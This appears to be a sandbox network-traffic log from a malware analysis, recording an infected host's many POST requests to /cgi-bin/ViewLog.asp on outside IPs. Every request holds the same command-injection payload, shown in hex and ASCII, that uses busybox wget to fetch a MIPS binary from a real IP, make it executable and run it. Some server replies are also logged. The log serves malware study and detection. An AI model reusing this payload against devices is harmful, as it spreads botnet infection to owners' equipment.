                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:50.786191940 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:53.153897047 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:57.761719942 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:06.721332073 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              537192.168.2.144254631.136.31.1988080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:49.096499920 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:49.666078091 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:50.818052053 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:53.153899908 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:57.761706114 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:06.977346897 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              538192.168.2.143357895.31.19.2108080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:49.869568110 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:50.208484888 CET618INHTTP/1.1 400 Bad Request
                                              Date: Thu, 23 Nov 2023 04:17:50 GMT
                                              Server: Apache
                                              Connection: close
                                              Content-Type: text/html; charset=iso-8859-1
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 31 39 32 2e 31 36 38 2e 30 2e 31 34 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><p>Additionally, a 403 Forbiddenerror was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache Server at 192.168.0.14 Port 80</address></body></html>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              539192.168.2.145016885.206.127.158080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:49.903151035 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:50.109057903 CET358INHTTP/1.1 400 Bad Request
                                              Date: Thu, 23 Nov 2023 04:17:50 GMT
                                              Server: Apache
                                              Content-Length: 126
                                              Connection: close
                                              Content-Type: text/html; charset=iso-8859-1
                                              Data Raw: 3c 73 63 72 69 70 74 3e 64 6f 63 75 6d 65 6e 74 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 27 2b 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 6e 61 6d 65 2b 27 3a 27 2b 6c 6f 63 61 74 69 6f 6e 2e 70 6f 72 74 3b 3c 2f 73 63 72 69 70 74 3e 3c 68 31 3e 45 72 72 6f 72 20 34 30 30 20 2d 20 74 72 79 69 6e 67 20 74 6f 20 72 65 64 69 72 65 63 74 3c 2f 68 31 3e
                                              Data Ascii: <script>document.location.href='https://'+location.hostname+':'+location.port;</script><h1>Error 400 - trying to redirect</h1>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              540192.168.2.144952294.120.51.518080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:50.083625078 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              541192.168.2.144103695.217.6.1758080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:50.098546028 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:50.294317961 CET552INHTTP/1.1 400 Bad Request
                                              Date: Thu, 23 Nov 2023 04:17:50 GMT
                                              Server: Apache/2.4.57 (Debian)
                                              Content-Length: 304
                                              Connection: close
                                              Content-Type: text/html; charset=iso-8859-1
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 37 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 31 39 32 2e 31 36 38 2e 30 2e 31 34 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><hr><address>Apache/2.4.57 (Debian) Server at 192.168.0.14 Port 80</address></body></html>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              542192.168.2.143365095.31.19.2108080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:50.103060007 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:50.462028027 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:50.462810993 CET618INHTTP/1.1 400 Bad Request
                                              Date: Thu, 23 Nov 2023 04:17:50 GMT
                                              Server: Apache
                                              Connection: close
                                              Content-Type: text/html; charset=iso-8859-1
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 31 39 32 2e 31 36 38 2e 30 2e 31 34 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><p>Additionally, a 403 Forbiddenerror was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache Server at 192.168.0.14 Port 80</address></body></html>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              543192.168.2.143862094.183.152.308080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:50.166336060 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              544192.168.2.144948231.188.28.278080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:50.308207989 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:50.516491890 CET465INHTTP/1.1 404 Not Found
                                              Date: Thu, 23 Nov 2023 05:17:50 GMT
                                              Server: Webs
                                              X-Frame-Options: SAMEORIGIN
                                              Cache-Control: no-cache
                                              Content-Length: 166
                                              Content-Type: text/html
                                              Connection: keep-alive
                                              Keep-Alive: timeout=60, max=99
